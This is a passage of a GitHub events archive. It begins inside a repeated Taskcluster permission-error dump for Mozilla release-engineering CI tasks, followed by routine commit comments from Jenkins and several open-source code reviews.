\\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:13:12.981Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:13:12.981Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"MzkVMxuRS9-w0yD0urG5OA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:13:12.981Z\\\"\\n}\\n  time:     2016-09-23T12:13:13.144Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"LGmOLf9eQE2JdEBb0CI7tw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_dashboard\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_dashboard\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_dashboard\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4a4916ef9a32a1533c9f4ba0d336d9ecd0c7c8a0\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:13:12.981Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:13:12.981Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"MzkVMxuRS9-w0yD0urG5OA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:13:12.981Z\\\"\\n}\\n  time:     2016-09-23T12:13:13.144Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"LGmOLf9eQE2JdEBb0CI7tw\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"shipit_dashboard\",\n                        \"description\": \"Test, build and deploy shipit_dashboard\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"shipit_dashboard\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.opened\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"4a4916ef9a32a1533c9f4ba0d336d9ecd0c7c8a0\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T12:13:12.981Z\",\n                    \"deadline\": \"2016-09-24T12:13:12.981Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"MzkVMxuRS9-w0yD0urG5OA\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T12:13:12.981Z\"\n                },\n                \"time\": \"2016-09-23T12:13:13.144Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"T8tPoyO9QGmFyennX8xs3w\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4a4916ef9a32a1533c9f4ba0d336d9ecd0c7c8a0\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:13:12.979Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:13:12.979Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"MzkVMxuRS9-w0yD0urG5OA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:13:12.979Z\\\"\\n}\\n  time:     2016-09-23T12:13:13.148Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"T8tPoyO9QGmFyennX8xs3w\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4a4916ef9a32a1533c9f4ba0d336d9ecd0c7c8a0\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:13:12.979Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:13:12.979Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"MzkVMxuRS9-w0yD0urG5OA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:13:12.979Z\\\"\\n}\\n  time:     2016-09-23T12:13:13.148Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"T8tPoyO9QGmFyennX8xs3w\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_clobberer\",\n                        \"description\": \"Test, build and deploy releng_clobberer\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_clobberer\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.opened\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"4a4916ef9a32a1533c9f4ba0d336d9ecd0c7c8a0\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T12:13:12.979Z\",\n                    \"deadline\": \"2016-09-24T12:13:12.979Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"MzkVMxuRS9-w0yD0urG5OA\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T12:13:12.979Z\"\n                },\n                \"time\": \"2016-09-23T12:13:13.148Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-23T12:13:13Z"}
{"id":"4608194758","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19145281,"position":null,"line":null,"path":null,"commit_id":"862bb0a4c4b69ed7099acdfc5025e8fd9074be67","created_at":"2016-09-23T12:13:13Z","updated_at":"2016-09-23T12:13:13Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35973/testReport/) for this commit**"}},"created_at":"2016-09-23T12:13:13Z"}
{"id":"4608196251","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"ORNis/openMVG"},"payload":{"comment":{"id":19145287,"position":22,"line":22,"path":"src/openMVG/features/image_describer_scaling_decorator.hpp","commit_id":"b975d01f269e38a05ec96ae765f3f0321584ec0f","created_at":"2016-09-23T12:13:36Z","updated_at":"2016-09-23T12:13:36Z","body":"perhaps the following works too ;-)\r\nMat3 H = Mat3::Zero();\r\nH.diagonal() = Vec3(scale, scale, 1.0);"}},"created_at":"2016-09-23T12:13:36Z"}
{"id":"4608200697","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19145301,"position":null,"line":null,"path":null,"commit_id":"66e03268efa405c96b0a05d488f51b4de9df27c9","created_at":"2016-09-23T12:14:42Z","updated_at":"2016-09-23T12:14:42Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35974/testReport/) for this commit**"}},"created_at":"2016-09-23T12:14:42Z"}
{"id":"4608201493","type":"CommitCommentEvent","actor":{"login":"ORNis"},"repo":{"name":"ORNis/openMVG"},"payload":{"comment":{"id":19145304,"position":22,"line":22,"path":"src/openMVG/features/image_describer_scaling_decorator.hpp","commit_id":"b975d01f269e38a05ec96ae765f3f0321584ec0f","created_at":"2016-09-23T12:14:54Z","updated_at":"2016-09-23T12:14:54Z","body":"more elegant indeed, thanks."}},"created_at":"2016-09-23T12:14:54Z"}
{"id":"4608203468","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"ORNis/openMVG"},"payload":{"comment":{"id":19145307,"position":5,"line":15,"path":"src/openMVG/features/regions.hpp","commit_id":"b975d01f269e38a05ec96ae765f3f0321584ec0f","created_at":"2016-09-23T12:15:22Z","updated_at":"2016-09-23T12:15:22Z","body":"You're right. Geometry cover 3D things for the moment. But adding 2d transforms can also be considered."}},"created_at":"2016-09-23T12:15:22Z"}
{"id":"4608207041","type":"CommitCommentEvent","actor":{"login":"arinagab"},"repo":{"name":"arinagab/Lab2"},"payload":{"comment":{"id":19145316,"position":null,"line":null,"path":null,"commit_id":"f6ec695d5d282581c295a791bcf05558988af869","created_at":"2016-09-23T12:16:13Z","updated_at":"2016-09-23T12:16:13Z","body":"Lab2"}},"created_at":"2016-09-23T12:16:13Z"}
{"id":"4608208531","type":"CommitCommentEvent","actor":{"login":"dingqz"},"repo":{"name":"dingqz/Java"},"payload":{"comment":{"id":19145323,"position":null,"line":null,"path":null,"commit_id":"36533d4e86bea327127f7eaa00cacf0c4b6f3e14","created_at":"2016-09-23T12:16:34Z","updated_at":"2016-09-23T12:16:34Z","body":"概念有     普通方法 main方法 方法调用 "}},"created_at":"2016-09-23T12:16:34Z"}
{"id":"4608210929","type":"CommitCommentEvent","actor":{"login":"nursix"},"repo":{"name":"sahana/eden"},"payload":{"comment":{"id":19145328,"position":5,"line":1042,"path":"modules/s3/s3resource.py","commit_id":"3adc2fb21df191adcaab8a076cbf89f08a5c0876","created_at":"2016-09-23T12:17:10Z","updated_at":"2016-09-23T12:17:10Z","body":"Nope - this would allow anonymous users to approve everything.\r\n\r\n    if user:\r\n        user_id = user.id\r\n   elif auth.override:\r\n        user_id = 0\r\n   else:\r\n        user_id = None\r\n\r\nOr short:\r\n\r\n    user_id = user.id if user else 0 if auth.override else None\r\n"}},"created_at":"2016-09-23T12:17:10Z"}
{"id":"4608212405","type":"CommitCommentEvent","actor":{"login":"ORNis"},"repo":{"name":"ORNis/openMVG"},"payload":{"comment":{"id":19145331,"position":12,"line":75,"path":"src/software/SfM/main_ComputeFeatures.cpp","commit_id":"b975d01f269e38a05ec96ae765f3f0321584ec0f","created_at":"2016-09-23T12:17:33Z","updated_at":"2016-09-23T12:17:33Z","body":"@pmoulon I hesitate between a subsample factor and a maxwitdh option"}},"created_at":"2016-09-23T12:17:33Z"}
{"id":"4608215993","type":"CommitCommentEvent","actor":{"login":"Hackerleng"},"repo":{"name":"Hackerleng/searchapp"},"payload":{"comment":{"id":19145337,"position":null,"line":null,"path":null,"commit_id":"96b7cd7811165d48d1ec8c7ddc08d7b57c172993","created_at":"2016-09-23T12:18:28Z","updated_at":"2016-09-23T12:18:28Z","body":"new"}},"created_at":"2016-09-23T12:18:28Z"}
{"id":"4608216314","type":"CommitCommentEvent","actor":{"login":"hbldh"},"repo":{"name":"hbldh/pymetawear"},"payload":{"comment":{"id":19145338,"position":null,"line":null,"path":null,"commit_id":"ebca753c07410b4411528fb6725ffb765ac27fda","created_at":"2016-09-23T12:18:33Z","updated_at":"2016-09-23T12:18:33Z","body":"Ah, forgot that. Will be rectified in `master` branch merge later on."}},"created_at":"2016-09-23T12:18:33Z"}
{"id":"4608220457","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"ORNis/openMVG"},"payload":{"comment":{"id":19145343,"position":38,"line":218,"path":"src/software/SfM/main_ComputeFeatures.cpp","commit_id":"b975d01f269e38a05ec96ae765f3f0321584ec0f","created_at":"2016-09-23T12:19:35Z","updated_at":"2016-09-23T12:19:35Z","body":"else\r\nDisplay a warning message saying that the parameter is invalid"}},"created_at":"2016-09-23T12:19:35Z"}
